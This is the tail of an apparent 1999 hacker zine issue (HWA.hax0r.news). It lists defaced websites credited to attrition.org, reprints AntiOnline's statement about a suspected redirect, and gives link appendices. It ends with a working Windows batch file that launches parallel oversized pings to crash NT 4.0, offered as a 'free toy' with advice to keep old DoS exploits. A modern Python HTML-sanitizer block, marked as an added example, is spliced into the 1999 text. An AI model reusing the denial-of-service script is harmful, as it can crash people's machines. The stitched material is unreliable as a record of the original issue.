Latest cracked pages courtesy of attrition.org

[99.08.01] [PulseWidth] Run Your Own Business (www.runyourownbusiness.com)
[99.08.01] [PulseWidth] Nellis AFB (www.nellis.af.mil)
[99.08.01] [ ] Nathan & Lewis Securities (www.nlfs.com)
[99.08.01] [HFD] Jerry Springer Show (www.jerryspringer.com)
[99.08.01] [AntiChrist] Expat News (www.expat-news.com)
[99.08.01] [AntiChrist] London Soft (www.londonsoft.com)
[99.08.01] [c0mrade] Maktoob (www.maktoob.com)
[99.08.01] [AntiChrist] K One Inch (www.oneinch.com)
[99.08.01] [AntiChrist] Sandhan (www.sandhan.com)
[99.08.01] [AntiChrist] Savmart (www.savmart.com)
[99.08.01] [AntiChrist] Two 40 (www.two40.com)
[99.08.01] [AntiChrist] Klassic Net (www.klassic.net)
[99.08.01] [AntiChrist] Adworkz Net (www.adworkz.net)
[99.08.01] [AntiChrist] Interstate Mortgage (www.interstatemortgage.net)
[99.08.01] [AntiChrist] McMahon Group (www.mcmahongroup.net)
[99.08.01] [stonehenge crew] One Online (IT) (www.oneonline.it)
[99.08.01] [gH] IDHL Gov (MY) (idhl.gov.my)
[99.08.01] [gH] Immigration Department of Malaysia (MY) (imigresen.imi.gov.my)
[99.08.01] [SOD] Instituto Geografico Agustin Codazzi (www.igac.gov.co)
[99.08.01] [keebler elves] #3 KBS Gov (www.kbs.gov.my)
[99.08.01] [FL3M] M Ecom Malls (www.ecommalls.com)
[99.08.01] [ ] Software Tester (www.softwaretester.com)
[99.08.01] [ReMiX] X-Forces (www.x-forces.com)
[99.08.01] [ ] CK (cc) Minnesota (empire.lansing.cc.mi.us)
[99.08.02] [SQ] KuKluxKlan (www.kkklan.com)
[99.08.02] [red n black] NHM (UK) (www.nhm.ac.uk)
[99.08.02] [LevelSeven] #2 Peronda Net (www.peronda.net)
[99.08.02] [v00d00] K Bears In The Barn (www.bearsinthebarn.com)
[99.08.02] [kastr0] Complete Chaos (www.completechaos.com)
[99.08.02] [FOaM] Karbrella (www.karbrella.com)
[99.08.02] [FL3M] K Career Concepts (www.careerconcepts.com)
[99.08.02] [KHG] Yugoslavia 8m (yugoslavia.8m.com)
[99.08.02] [AntiChrist] Plague 99 (www.plague99.org)
[99.08.02] [AntiChrist] Pleasant Valley UU Church (www.pvuuc.org)
[99.08.02] [AntiChrist] Chinese Club (www.chineseclub.org)
[99.08.02] [AntiChrist] Faith Walker (www.faithwalker.net)
[99.08.02] [AntiChrist] K Starcraft Bunker (www.starcraftbunker.net)
[99.08.02] [AntiChrist] Buy Fab (www.buyfab.com)
[99.08.02] [AntiChrist] CCP Inc. (www.ccp-inc.com)
[99.08.02] [AntiChrist] Click2site (www.edwincolon.click2site.com)
[99.08.02] [AntiChrist] Fil India (www.filindia.com)
[99.08.02] [AntiChrist] General Technologies (www.generaltechnologies.com)
[99.08.02] [AntiChrist] Gentleman Dog (www.gentlemandog.com)
[99.08.02] [AntiChrist] India PR (www.indiapr.com)
[99.08.02] [AntiChrist] Joke Pizza (www.jokepizza.com)
[99.08.02] [AntiChrist] Keywest Shrimphouse (www.keywestshrimphouse.com)
[99.08.02] [AntiChrist] Trivandrum Fair2000 (www.trivandrum-fair2000.com)
[99.08.02] [AntiChrist] Work Comp Online (www.workcomponline.com)
[99.08.02] [Offline] Cairo Net (www.caironet.com)
[99.08.02] [bl0w team] Symantec (www.symantec.com)
[99.08.02] [FL3M] Bennett Street (www.bennettstreet.com)
[99.08.02] [FL3M] K Gamewood Net (www8.gamewood.net)

Of note:
  AntiChrist calls it quits
  NYS returns (worthwhile reading)
  Several new defacers hit the scene

[99.08.03] [PulseWidth] Amedd Army (akamai.tamc.amedd.army.mil)
[99.08.03] [AntiChrist] Trivnet Club (www.trivnetclub.com)
[99.08.03] [NYS] K Acte Enterprises (FR) (www.acte-entreprises.fr)
[99.08.03] [ProdiByte] Rosario Bus (AR) (www.rosariobus.com.ar)
[99.08.03] [Some Guy/Cat] Home Amateur (www.homeamateur.com)
[99.08.03] [PulseWidth] K Model Aircraft (www.modelaircraft.org)
[99.08.03] [PulseWidth] Health Library @ McGill (CA) (www.health.library.mcgill.ca)
[99.08.03] [ProdiByte] Bonobus (AR) (www.bonobus.com.ar)
[99.08.03] [KHG] Anti NATO (antinato.homepage.com)
[99.08.03] [KHG] Anti NATO Links (antinatolinks.homepage.com)
[99.08.03] [sciofide] K Cyber Match Hawaii (mail.cybermatchhawaii.com)
[99.08.03] [KHG] Serbian Links (serbianlinks.homepage.com)
[99.08.03] [Tranzer] Alerion (www.alerion.com)
[99.08.03] [PulseWidth] K Buck (www.buck.com)
[99.08.03] [Saeid Yomtobian] Lost Pussy (www.lostpussy.com)
[99.08.03] [HiP] #2 Mall LA (www.mall-la.com)
[99.08.03] [Tranzer] UPN 35 (www.upn35.com)
[99.08.04] [PulseWidth] DOF CA Gov (www.dof.ca.gov)
[99.08.04] [mozy] Pelican Org (AU) (www.pelican.org.au)
[99.08.04] [PulseWidth] Cumberland (www.cumberland.org)
[99.08.04] [KHG] Serbia Online1 (serbiaonline1.cjb.net)
[99.08.04] [Cobra] Stop Nato2 (stopnato2.cjb.net)
[99.08.04] [Pakistan HC] (net88) CAIS (net88.cais.com)
[99.08.04] [neeper] Home Web (www.home-web.com)
[99.08.04] [keebler elves] Teens Land (www.teensland.com)
[99.08.04] [mozy] WEVU TV (www.wevutv.com)
[99.08.05] [ ] AntiOnline Security Site (www.antionline.com)
[99.08.05] So [kl0wn krew] Abatelli (abatelli.com)
[99.08.05] So [SQ] Energia GOB (MX) (atomo.energia.gob.mx)
[99.08.05] So [ ] (code02) PBTech (code02.pbtech.net)
[99.08.05] Li [holo] Tuo BME (HU) (minek.tuo.bme.hu)
[99.08.05] Fb [doofoo] Nailed (nailed.com)
[99.08.05] NT [CUM] Adl Net (www.adlnet.org)
[99.08.05] NT [CUM] #2 Alloweb (www.alloweb.com)
[99.08.05] NT [CUM] Become Net (www.become.net)
[99.08.05] NT [mozy] Amazone (www.amazone.com)
[99.08.05] NT [ ] Comsoft (www.comsoft.com)
[99.08.05] Sc [tvc] Web Banners (www.webbanners.com)
[99.08.06] So [LevelSeven] Poulan Weedeater (www.weedeater.com)
[99.08.06] So [LevelSeven] Tytan Industries (www.tytan.com)
[99.08.06] NT [mozy] Stadskanaal (www.stadskanaal.nu)
[99.08.06] NT [v00d00] Meadowood Retirement Community (www.retiretoiu.com)
[99.08.06] So [HiP] NorthStarNet (www.northstarnet.org)
[99.08.06] So [LevelSeven] Santa's Official Page (www.north-pole.net)
[99.08.06] So [LevelSeven] News Tips (www.newstips.com)
[99.08.06] So [LevelSeven] Multiverse (www.multiverse.com)
[99.08.06] NT [Citadel] Los Angeles City Site (www.la.com)
[99.08.06] So [LevelSeven] 92.3 Cleveland's Jammin Oldies (www.jammin.com)
[99.08.06] Ir [kl0wn krew] Illinois Institute of Technology (www.iit.edu)
[99.08.06] NT [Xessor] Garth Brooks' Official site (www.garthbrooks.com)
[99.08.06] So [LevelSeven] Best Supply (www.bestsupply.com)

Hacked: http://www.prowrestling.com
By: gH
Mirror: http://www.attrition.org/mirror/attrition/com/www.prowrestling.com/

Hacked: http://www.idhl.gov.my (second time)
By: Hi-Tech Hate
Mirror: http://www.attrition.org/mirror/attrition/misc/www.idhl.gov.my-2

The following site appears to have been defaced. Mirror to come....

HACKED(?): http://www.antionline.com/eye
By: Unknown
Exploit Used: Appears to be a redirect or meta-tag redirect. This has not been confirmed although we have witnessed this for ourselves. Details to follow.

AntiOnline Hacked?
Thursday, August 5, 1999 at 13:43:28
by John Vranesevich - Founder of AntiOnline

Following its policy about full site disclosure, AntiOnline offers the following statement:

AntiOnline's newest feature, "Eye On The Underground", gathers data from several well known underground websites. The data is gathered dynamically once an hour via "AntiEye", one of our custom info-gathering applications.

Today, one of the sites that we gather data from, Bikkel.com's message board, changed the format of their content to feed our website information other than that which was intended to be viewed from their actual webboard.

Although this change in format in no way compromised the integrity of our servers, or the data contained therein, it did cause alternate information to be displayed on the "Eye On The Underground" section of our website to users who had specific versions of the Netscape and IE webbrowsers.

We apologize to our users for the temporary disruption of this service. AntiOnline receives a hack attempt an average of once every 2 minutes, no one has ever successfully infiltrated any of our systems, or the data contained on them.

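
The statement above describes a page that republishes content scraped hourly from third-party sites, and the report before it mentions a possible meta-tag redirect. As an added example (not AntiOnline's code and not part of the original newsletter), one way to keep such a feed inert is to reduce every scraped post to escaped text and raise an alert when a source starts sending active markup; the function names, the source name `board.example` and the sample posts are constructed for illustration.

```python
"""Added example: render scraped third-party posts as inert text."""
import html
from html.parser import HTMLParser

# Elements that can redirect, frame, load or run content in a visitor's browser.
ACTIVE_TAGS = {"meta", "script", "iframe", "frame", "frameset", "object",
               "embed", "applet", "base", "link", "form", "style"}
# Elements whose body is code or styling, never message text.
SKIP_BODY = {"script", "style"}


class _TextOnly(HTMLParser):
    """Collect text nodes only and remember which active tags were seen."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.chunks = []
        self.dropped = []
        self._skip = 0

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag names, so <META ...> and <meta ...> match.
        if tag in ACTIVE_TAGS:
            self.dropped.append(tag)
        if tag in SKIP_BODY:
            self._skip += 1

    def handle_endtag(self, tag):
        if tag in SKIP_BODY and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.chunks.append(data)


def render_post(raw_html, max_len=500):
    """Return (escaped_text, dropped_tags) for one scraped post.

    No tag from the source survives: only text nodes are kept, whitespace
    is collapsed, the text is truncated, and only then escaped, so the
    output cannot end in a half-written entity.
    """
    parser = _TextOnly()
    parser.feed(raw_html)
    parser.close()
    text = " ".join("".join(parser.chunks).split())[:max_len]
    return html.escape(text, quote=True), parser.dropped


def build_section(source, posts):
    """Return (html_fragment, alerts) for all posts scraped from one source."""
    items, alerts = [], []
    for number, raw in enumerate(posts):
        safe, dropped = render_post(raw)
        if dropped:
            alerts.append("%s: post %d carried active markup: %s"
                          % (source, number, ", ".join(dropped)))
        items.append("<li>%s</li>" % safe)
    return "<ul>\n" + "\n".join(items) + "\n</ul>", alerts


# Constructed sample posts, as a scraper might receive them from a board.
SAMPLE_POSTS = [
    "<b>New advisory</b> posted for wu-ftpd &amp; friends",
    '<META HTTP-EQUIV="refresh" CONTENT="0;URL=http://other.example/">'
    "You have been redirected",
    "<script>document.location='http://other.example/'</script>hello",
    "Use &lt;meta&gt; tags with care",
]

if __name__ == "__main__":
    fragment, alerts = build_section("board.example", SAMPLE_POSTS)
    print(fragment)
    for line in alerts:
        print("ALERT", line)
```

The alerts matter as much as the escaping: a source that suddenly starts sending `meta` or `script` elements has changed what it feeds the scraper, which is the moment to stop republishing it.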
and more sites at the attrition cracked web sites mirror:

http://www.attrition.org/mirror/attrition/index.html

-------------------------------------------------------------------------

A.0 APPENDICES
_________________________________________________________________________

A.1 PHACVW, sekurity, security, cyberwar links
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The links are no longer maintained in this file, there is now a links section on the http://welcome.to/HWA.hax0r.news/ url so check there for current links etc.

The hack FAQ (The #hack/alt.2600 faq)
http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html

Hacker's Jargon File (The quote file)
http://www.lysator.liu.se/hackdict/split2/main_index.html

New Hacker's Jargon File.
http://www.tuxedo.org/~esr/jargon/

HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.ducktank.net/hwa/issues.html. ** NEW **
http://www.alldas.de/hwaidx1.htm ** NEW **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa.
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://archives.projectgamma.com/zines/hwa/.
http://www.403-security.org/Htmls/hwa.hax0r.news.htm

International links:(TBC)
~~~~~~~~~~~~~~~~~~~~~~~~~

Foreign correspondents and others please send in news site links that have security news from foreign countries for inclusion in this list thanks... - Ed

Belgium.......: http://bewoner.dma.be/cum/
Brasil........: http://www.psynet.net/ka0z
                http://www.elementais.cjb.net
Canada .......: http://www.hackcanada.com
Colombia......: http://www.cascabel.8m.com
                http://www.intrusos.cjb.net
Indonesia.....: http://www.k-elektronik.org/index2.html
                http://members.xoom.com/neblonica/
                http://hackerlink.or.id/
Netherlands...: http://security.pine.nl/
Russia........: http://www.tsu.ru/~eugene/
Singapore.....: http://www.icepoint.com
Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine.

Got a link for this section? email it to hwa@press.usmc.net and i'll review it and post it here if it merits it.

@HWA

** FREE TOY INSIDE! ***

This is an old and (should be) dead issue with Windows 95 boxen. The Ping Of Death (PoD) was quite rampant, and created havoc on irc and elsewhere in its day, you can test your box for PoD vulnerability by using the following batchfile. Note that results do not always occur immediately, but sometimes occur several minutes after the 'attack'.... included for the hell of it, I was bored, the file was just there so wtf? you know? kinda like trying an old exploit you KNOW is gonna be patched but wanna try it anyway? sometimes with newer versions of software old bugs are reintroduced so don't throw away all your old DoS programs or exploits, check your systems regularly.... - DrunkPhuX

--cut--
@echo off
cls
echo ------------------------------------------------------------------------------
echo IMPORTANT INFO:
echo.
echo This Ping of Death works best if you try to surf the Internet
echo at the same time. Now I will try to start the web browser for
echo you right now. If it does not start, please start one right now.
echo.
echo More info at http://www.sophist.demon.co.uk/ping/
echo Author of this batch file can be reached at [ag115@freenet.carleton.ca]
echo.
echo This crashes the author's NT 4.0 Service Pack 1 system reliably
echo and one other system. A third system didn't work, though.
echo THIS SCRIPT PROBABLY DOES NOT CRASH SYSTEMS OTHER THAN THE ONE THIS RUNS ON!
echo.
echo Please flush your disk cache first to be on the safe side.
echo This is done by hitting Ctrl-Alt-Delete once then hiting Esc to return.
echo ------------------------------------------------------------------------------
echo.
echo Attempting to launch Web Browser, please wait...
start /high http://www.microsoft.com/
echo When a web browser is up, press any key to start Ping of Death on localhost.
pause
cls
echo ------------------------------------------------------------------------------
echo Now Initiating Ping of Death flood to localhost!
echo ------------------------------------------------------------------------------
echo.
echo This may take a few minutes, especially if you only have 16 or 32 MB.
echo Please wait until the prompt returns before you try to surf.
echo Forking Ping of Death processes...
REM Seems to work best with taskman loaded, for some weird reason.
start /high /min taskmgr.exe
for %%d in ( A B C D E F G H I J K L M N O P Q R ) do start /min ping -l 65527 -n 1000 localhost
cls
echo ------------------------------------------------------------------------------
echo READY TO CRASH WITHIN THE HOUR!
echo.
echo Ping of Death in now in progress...Surf and Die - pun intended. ;-)
echo You should see the blue screen with a STOP error soon.
echo.
echo You may surf now. Remember, it may take 10 mins to crash. Or less. Or more.
echo And not all NT 4.0 systems will crash with this script.
echo You could try launching TaskMgr and a few small apps to expedite the crash.
echo ------------------------------------------------------------------------------
--cut--

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--

© 1998, 1999 (c) Cruciphux/HWA.hax0r.news (R) { w00t }

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-

[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
[45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]